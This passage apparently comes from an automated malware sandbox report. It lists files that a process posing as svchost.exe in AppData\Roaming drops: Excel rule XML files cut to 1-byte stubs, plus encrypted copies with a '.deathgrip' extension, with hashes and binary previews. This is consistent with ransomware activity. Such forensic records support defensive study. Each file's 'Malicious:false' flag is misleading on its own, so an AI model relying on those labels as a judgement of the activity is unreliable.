                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule70037v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):800
                                                          Entropy (8bit):7.422662232054431
                                                          Encrypted:false
                                                          SSDEEP:24:KBPdl5sLEWAbuKUWA0G/VhPbFOZWVajGGytMvj:KBr5sLEX6KyTAZWVa5j
                                                          MD5:7FA52BA2883C179A1C66B5215213E7A1
                                                          SHA1:2431D0CA181DC1CBB142EE0287A0FB32D51524FD
                                                          SHA-256:414128691EFE7857F9767A7EDD8A4793239E03770DC556F85C5D0D2456109E0C
                                                          SHA-512:E06838522EBD62C1BA2C11865625371881336187F8EAA022C381964F329826745B34EB88551C0CDEA80C9FA45A033F148F661FDA4A3B088B9FC11D631BBBA511
                                                          Malicious:false
                                                          Preview:........#...c....0..}}cV./.Q.Lj...[.....Nn.)..!.....`,..../..wAN.;%.....(....E)MHw.P....f!N.AqY.....ED.....I.......Gk...\.....(.hU@.-h.H..m/.@.s.z.Nq{{.........pF...S.J.=^....9j..2......ce..$Sf....E......!.t.8...U/......"...G.a......<...._Xv.W.R.....y)y.*...QQg.v=..{[..C>\.^&.u.. .(3x...G.o..>.!.....j..X...}.f..5..f....3.2.h.....Qk.....w..lO...g6@vPY...........>PU.g......{..T.Y..R.....n.d6..E5.....Y5~.0..<.)..K."I.p..duO.{.{Q.~s.NwfgqnHpyRC7AWA/3NZXi8gz0vnFqoUX+KhaXV8Wac5lhH9spEb7Vsve8QiRweCYJPTE2GC2o1Mw+KWy64Gp7HV3/o1oFJq+cF+3ag6TyXiKa83rNQBErdPrb70hgZW2g78tpQTzPmpu7WB8HmRNKNRFdt6YAucoC2muNPuyU0TvhFq60xPSLufHbzBITVZzaov+LjikH9WiWQXbp1YXDfVbqEOV1+trij0bg+2EeiYz1gpVRvCbCHnXXQbf6Qv74yWHdae8E46KUDluub53N1t0Y0vdeyRNVhr7icstcxYltM0mjzKsrnSU8ZAdterQubrBs6Ed+RPQ/IYNWcXU+g==

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700400v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700400v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.792305592730554
                                                          Encrypted:false
                                                          SSDEEP:48:g9bh4CgllNzJ2nLL4QygoOrvkeM1Is84hBpyc8htpI:g9bh7gRNuLL4tt0MeM1e4fYcQI
                                                          MD5:B3F5C58164B31793E16181FF1539FC95
                                                          SHA1:FD5C1DBA1A15B9FD79FF6410878590E310C5F076
                                                          SHA-256:495C710C2AC862674E00366BCDADD5364762E91C19D1B8916993B42202F86D88
                                                          SHA-512:0A944252A540B3789B5B9A1D4FB4853D0D22FDF3A2DF2BF6BD2D2DFF2ABF56C9EC1C612B9CE3EC0F311EB698881744AA5595E8AAC609BBA7160778787D05B645
                                                          Malicious:false
                                                          Preview:............c..\%eR90.=.Kkc.~...... .%.fk~|..-....0.Q.......8.Mcg.=..T........F.w..^....M`.q..g.....3g.v..|P3.3J.............qf>9g.E.._......R.u..3?...D-X...z.j..A..7$................B..|...9'..a....8...#..r......5.e.Z.....A....Z)...B..8ge....i...........$"=..K..Y.e#-.......)..{..N....Y..B.m..#1Z.X....0.j..Y..T..TF^.h..b.....!..K.c.^c.0..m'?n./.....'..bn./$......l.=/.Q2...P..r.)..RI..E*=.].I....(.....v4Z....l./......Q~..U..EN.U..D.S...p<...h/J....y..Q...(.e...0..a..j...d.I....Y.....~<?tD.sP&.c@...;d_....?j...)Z.....n......RO.8._G.ev...!..\..?...K...Z......4.@.'>.q..*]`.3..2.. 4..........M.?.B?O..s..4....C...4ke..{r#.E|...7.NK...qq...W...hQ.5........\{j..m.Y..X..j`T.R.?.B...fg...#<.8;.).a......?s.?y.......E.M.i...y.....3.#....L5...p0..M.(W=..i$N?..ii^.u..4..^.H.|...V....h.6...>n.8....2~*.z#.......*2NA=0.0$.....0..Zm.4.+.U.&cC...-..+..B..Bq)s......e....7....V(J.q./..T...BD!..-....g.#&...xnl.......4Lc....=*.../4L.I.M.~....;.M....\.

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700401v2.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700401v2.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.824513415750294
                                                          Encrypted:false
                                                          SSDEEP:48:b4Ex/OaS/r+VPADqdPkUT9X6Fyrd7yNtzxqo5:cEdOazV7WUT9X6wItso5
                                                          MD5:125E541EAAF9D6749208123EAAFE4157
                                                          SHA1:D3A3B10F72C540F527BDAC2C0AA631B7E2B3A1D7
                                                          SHA-256:528AF2F37EBFC66A882B74E0587672EF142787D37FD283C96C55FEA101B9F025
                                                          SHA-512:910C29E9E06D132BB0922665C448A053D5E61633FC93245BB4043EC66A79EBC6D8CB0D0CF1E5D268B003856E0236211033A8E25DD2F680D733DA1E90298C821F
                                                          Malicious:false
                                                          Preview:........U..8...3.,....N...V.J.$).z4.........C.<s@...:.`.9..C>=.(....Bb..'..}....l...</qyR8.eJ.Z.........3s.c.Z.P.9..&...BF(....v..x..\..S....\.?tq#,..-..J.+.ZA.. ...S..A...b..{>s...c.L.".%.<..8.lQ.U...q.^.........O...9w.;....X^....O...E...'-@=...b.V.4..&..W.k......($...1..l.@.L,%.......;...6.!tr..2.O.}jD-.^X......d......vB...~...8.......E9...oE..t...E......V--..._8..^.Y..?...p.H~.I.\[..W[..K5....HVCV^.Q...qG..p............B.=...Y.na........{{.oy.2w...;}.k.........E....v...#_]@g..pq.8...N...2..._+.....p...3.L@..=.].v.k8.....k>7.o... u.N!.5.D..r..[u..\....n.....[..r.uz....b.3.....X....F]...G.....y.1Ws4./<...U%......../.d.x..G...!$M..L.b'.../".w9Gr6...8...d.WU...stp...&Bh.\..P.........Ib_..'......C-'``.j{. ..z#...PS...h*+.T...........[~.z..<........#..S.{.,...r.`..FJ..d....=4(..6Sf.....IQ~..t(._).Z.^.\.....t.8.....B...(.@O<..}..i......:..cP.i|x8.;Xlw9Kq..i.nZ..V...).....2i.Q9.&?8X.<#2K..A.....+..7..h...|.2....80..|.k..?.2dk]U..:.n..@.......

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700450v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700450v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1712
                                                          Entropy (8bit):7.823523583599312
                                                          Encrypted:false
                                                          SSDEEP:24:+3ww0V23wleYbIBp/U7pJMF4c3YtLxwdoEjhvjyOoiikNPB6NPNGaLfxYXG+8M7l:++V26bq6VvciybyUr6N3pb+8i
                                                          MD5:379DF26B649FF696A090ABECBC6994C3
                                                          SHA1:2EE16697D36C957B1DC54C9645DC58EAD449217C
                                                          SHA-256:255F237A155726C94FA09E4BB41966753D6A33A3E37DA6AFC65398148B6911BA
                                                          SHA-512:9B3D58D62042BA0186CC21D5C162311BC36C8CD6DAB958E8494E0E58A958EA8C201785ABEF0ED0E48715B7882984124CAD28F14B0D2BB11D3DC22377FAA777DA
                                                          Malicious:false
                                                          Preview:..............z......$_..g..;.US@6,%..-....pG....P..cS......6..pL.<Ky......a.;..r.o.......&.K.....a.f8K.1C.l......".&7....JM.G,R.F....d.1I.@....|.x.......M...`o...W..@Hky..>...47.......@..X...c...*....c....p..r9....d.J.AZ..G}.y...{..5..I..a..<...#EJ3L..'l.........:=..1...*.hS`+Y..P.j.[.B;.%._.|`#@..^..j.b...D..k.......R>.i?.9.]/.....x.....k..nI...$.?...r.d..F...$...7Vo.\..?..LE44@.+$:....}..F.A.A..~W....'.`.f.....)..L@......>.C 1.{. 0...w....*...../.t.........@.LGI.....v\..B.F.1..56....a.....VS.....2.[d.g.S....nZ.cs.<.;.04_.ga.._G...<"$.?%..Z.6......G*....N.S'....dSf.kS.2.'h.WW.w.vf.....oj..C..}.n..L.K9Z.M_../>.q.R....ry.._n.gn.......U...d.JB....8L.....m....w.q.q..C..(.Cg....C......A.z.n{"...fB.[}L..|-B{4/......G....r.6.9q....8+..p.T....W...m.]...a*...<",..a...y.....Il..w..u.T.18..i7..}..._.. ..We%.N...[....v..$.0.?......3...x..>k....&.-.......l....3K..0.{x..&.D~.Li4..p...Nh\.LjI.N..[;.}.....M.....[~\...%`.......C@;..<g...B...#.}.....`

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700451v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700451v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700500v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700500v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.793683805769507
                                                          Encrypted:false
                                                          SSDEEP:24:Sa2l/xnOWZSDfs2nOSuy/4mBQ5ITrMXmXWSlsKVfGNqZ6HJNDwV:p2dgfsfy/05ITr3by1NuY0
                                                          MD5:A5D63C3FE53F057C1E01D22A2CDD29CE
                                                          SHA1:FA01D64A8F28ED4FC86E201DC72FD96121C78B7D
                                                          SHA-256:4B472F882A6C443D2C54FA2CBA6B3F130D6E9E6467C72F2B5E2E270B8FAF71DB
                                                          SHA-512:2321678528F6B58203233B78C906D2077E43234A6D7A48989455C6A2A9460072C3C44D037595FCB5621279F4A105B71E685633A457EBE8F501308C39D6A6A1E9
                                                          Malicious:false
                                                          Preview:.........BR..\1.Tq..W.'.c.Pph....:..BF....?..3..9.sk,..r.e...s.~).8{{c9.$..@bb.....V..`......'6.T...>.G..I....K@8(.x....[.^.Lt.3H....e..<....h...I|....'.......k.}.d?.`L...t{))...Gr..v......V.....NuF.^...aX..r~Kw....X.........9(dg.dN...^../......=.\h>X...... .....w...y.t1..Q...h..#...5.|..s...o....r"9....?G..(V....I....^.3.+;.P.........nL....6.U.+.3II...v...,YO..>;.5...-..PI..RJ.....E.MNm"..G9......5...}.D....n~(....U<...%.}.e.;..g...B?....J}..p.6(..n}.uO.........9.N.}.v9..]...f...L6x..<...........Q.s.1..1.,....2...g..}hR..'.2g.R....~)&U.V.3^.9..c.y~[4F.@q^.I.V....n..$..6...f..w)...M..I.....a....-.RJ.y.O.OJiQo..P...ny.xV)u.s..p.-.9..-.i.....KG.7.!....&..x../......!f..z..'..+..s.....X3..D.t.=.........2..Ja..?.6.[.K9.8jO...\.y=..k(.i..4..1.\....,..&.V.8".C.4...f.e...../...)..Z_..#.s\.......^...n..4...3.o..K..=.{.....\..l.....wT...n...B....?..r.~\.\3../..Ac.e*6..]......-.gy.E.....s...>..iqL.....V.z.!!=..'@..,..(U..y.?p.k........<u.Pf.Tr.....^..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700501v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700501v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.828684597933524
                                                          Encrypted:false
                                                          SSDEEP:48:mKMz5sC1RGhB3yLQMQ2YsMd8zzKe2pV3R4xHTJGCEn:mKzkO3utvE8zzKnNebtE
                                                          MD5:B58B26246A14A5736793A7B6751669DC
                                                          SHA1:9F6FFB6674A695D94F05826E21E45675A90F95A1
                                                          SHA-256:773FBCF23419CF59DCB292F41B6FE499E8E1CE7D7149E6F03E2DA2028F8180BD
                                                          SHA-512:FA45573246B214718C5E774D84C191C9EB4BB799DA5889A4E288EA557928FBFDFB92BC316A147E0DA850A384A556D474760AEF0A21283DF762100718FC4195A3
                                                          Malicious:false
                                                          Preview:.........x:.5..d....b..B..... [&..&.g.T\o.X......Z....0...Z.q....$&........3cg>8...2(../......p.......iv......Cn.0 ........;HQ..'.. ...:v.......;=U.3.[.OZ.'..Q.%.tR.`W.o;...\%..A.U..{.x".._..p..1}.Oc0.%..o.{....j....V.....|..M./.7.....6....L.~...hw...K.@.,.\MS..".U.v?.p.I_vUE^....f..<.lL.K. .?.hb..K..Ml...L.....I...a....;.T...V.C.r@........y*{........u.yV...DlC...Rb.$?.m:...........g.wf...`.....x..#.z.x.C/q .E9l..W.w..avm...=3c...i.]V..NC..._`.4..}w.r.m...y.5...;...O4...PB.B..D...:.u|c.n..n;.3OB..1E......YQ.MwC..{.g..0i...rvv.. {.....;.u...I....xU..!..Fk4.x..}..%....o.g...~..-.I...."{..L.ZzK...G#t...<9.P."....N!,db.Rnd_.}....9Q....m...>..U..Z........... ..x_dP.....`..hb......".....N...?ck8.1?$~&..6...XQ.....g)j....c......p...n.^<k..=*.`.Z.s.r{F.....v.m~[.5..zc.h....v.1O7j8.4{\....8................/...(..H./....u...H.........(_..z.....R.....[r.i..M`.|.7I.]..*..k.........k..9^d....O.Y.....:..N.c..S.1.?@[k.,/..8.....)N" xS..%...x5.0..

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700550v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700550v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700551v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700551v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.789642158581483
                                                          Encrypted:false
                                                          SSDEEP:48:vCRiEBSLSTaA/8cDx9vvYJCmEyetXnS1kV4Tv:vCAmpxV9YJC3yetXS14Mv
                                                          MD5:A4D72AD3478BF54926BD8DB1B3CD3C75
                                                          SHA1:DBB1C70409E71B86372FDF4067D1C1D7C87A79AE
                                                          SHA-256:1F65C4BD7F321F7A3C890550D88D28135FDC6F04C307BF78AEAE66B88514F1B2
                                                          SHA-512:FBF07D43518E33F1357BDAC63B869DFFEF163EA8F0DC9E9EB420087B4A64EF2C65AFDAFEA6F66071006EED6C1FB23A0F8FFF838FC9DA894D05D57C2058D8AD84
                                                          Malicious:false
                                                          Preview:.........?F.s,...+in2.^EG4......B-..q.Q...G7...X.k.C*.)E.....Z..h..*.7.. f.' .6..a.2...J...d...;.t....G...p:Q.TXC..W...8.....4..`q.P.NzqIv.h..g.........B0.2c...G..g^M.rQo(."q...j..<...M[7&H.Y.ina.^...-.}Q..K..0..r,2.a.....V........u...........0uo9..z.......G....&.9B)..Y..x.>s..-.J.|Z...](&..Y.'..al..!...j.zc.U!..t.....`M..gO6..6.R#l~...d{.6...A.....)..D..>Y..R.9....x.....|.....]...KpY+...:..&..$.k..*..d.{...z.._.Q.Za...P.:L.M,........t..|..W....R.d.....f....n..n..)..8..z..l....}U.%..zA..>.<.9nh.1e!...(+.A..{.^.[.a........t..Q..wi^..71{T/........s.l.......Q..nNuL......D.b..s...N....c.NU.....;w.....;..".....$|i.`X}M.t..W.8.:U............?.7...lU.t...hh.fr..8....fgEh(.f...t......=...ZV.BP..S....X.....M...._..6k.7X."...#....w.7....m+....W6#e#.).....J.;1.3....%.....V.Y.8.u}.....&..;(...Vi._..6. .y.+O8..........4Sv.M.N].y....:.[..P.;.p.:.!o....8o.!{.1.t]..d......s<.v...a.q-%..U........D..5.Kd.._..h*8.+..T.T...;SD...4.}d&u.....XJ.........._g.j

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700600v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700600v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700601v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700601v1.xml.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1760
                                                          Entropy (8bit):7.815680189410624
                                                          Encrypted:false
                                                          SSDEEP:48:GJnyjYi+jiYm+dTkVkOkDHTejmNxBixBKK/ieXj+uDGFIKVtgZw+a:3kXji/+yuNxOKKKeT+oKjOXa
                                                          MD5:92DEA004F0B508CB0C1378868936CDA9
                                                          SHA1:527FD4463A10285315578DAD2EF6D32017002B97
                                                          SHA-256:B3F676F994EF631979A2C280CC4EFA36D510D8795D74FE0507CC497232B69B77
                                                          SHA-512:5B9636433BA319817CA18DDC9E39D7C8DCCD1791483F673E880BB1F1C95D5DBC7FC82BC89CD38FEB912E74FDCE17AEDACE7AD462FEB790AA53521147A07DF37E
                                                          Malicious:false
                                                          Preview:........J.k....;o.l..EC.KqF.A..:...."8.4..&%.....j.mJb...<...".Q<..1......-...!.6O..K..7......h......../.....lN.._4*....+...s..Qn.N._0.:.\...%.y....K.h..$.Oam".T=...&.Yf}* ...4A..MW..8@.=...V6..&A.K..Bd....OE......^.Y@6.YM.....d8A.Y..i..a>.3.u..."P...a...I!yf.@E.L(.B.N.J.<0.6...\..\......O7Z...lp.e..Gz.0..D4.....[..DQs....GM.@..V.*|.G...VbI.C.Q.O0.\c@.....fU...h.+#.c..\m.-e..m.r......!.......>2..............B..SF....I6}........8..R>M.+Cr..t.....=._<.....6...k?..".X.r.(h.qK[eO$....}N.F..%e..L....{.D...|......3j.:.`d.Z...t~..qV"'.N.(.....=."8..'....2.P.R....j'.'...nz+w.....8....g........!0.AG .a..K+..@.....F._......hYSE.lB....A_....#.8.Y.lI'...S...:%6oi.T.R..Nf.|.c.g.5..o.um".?.I..S..a.....q....[32....F..... .`....>%c..o........S.N=...C.. I{eD......h...?....3.l.q8$......!q.3.t.s..Z..v..T.EknJ.GH..aO._z.YBZ......sU(.8...C.H...f\..%.k..A....<.3..3..4..b.).pv.$.:.a.Y.^....K\.s.Ta..ga#3k.x.L.I..m.....D.x....~...<L.$...SV.\F....c^..._..V2P.i..pd...

                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule700650v1.xml

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
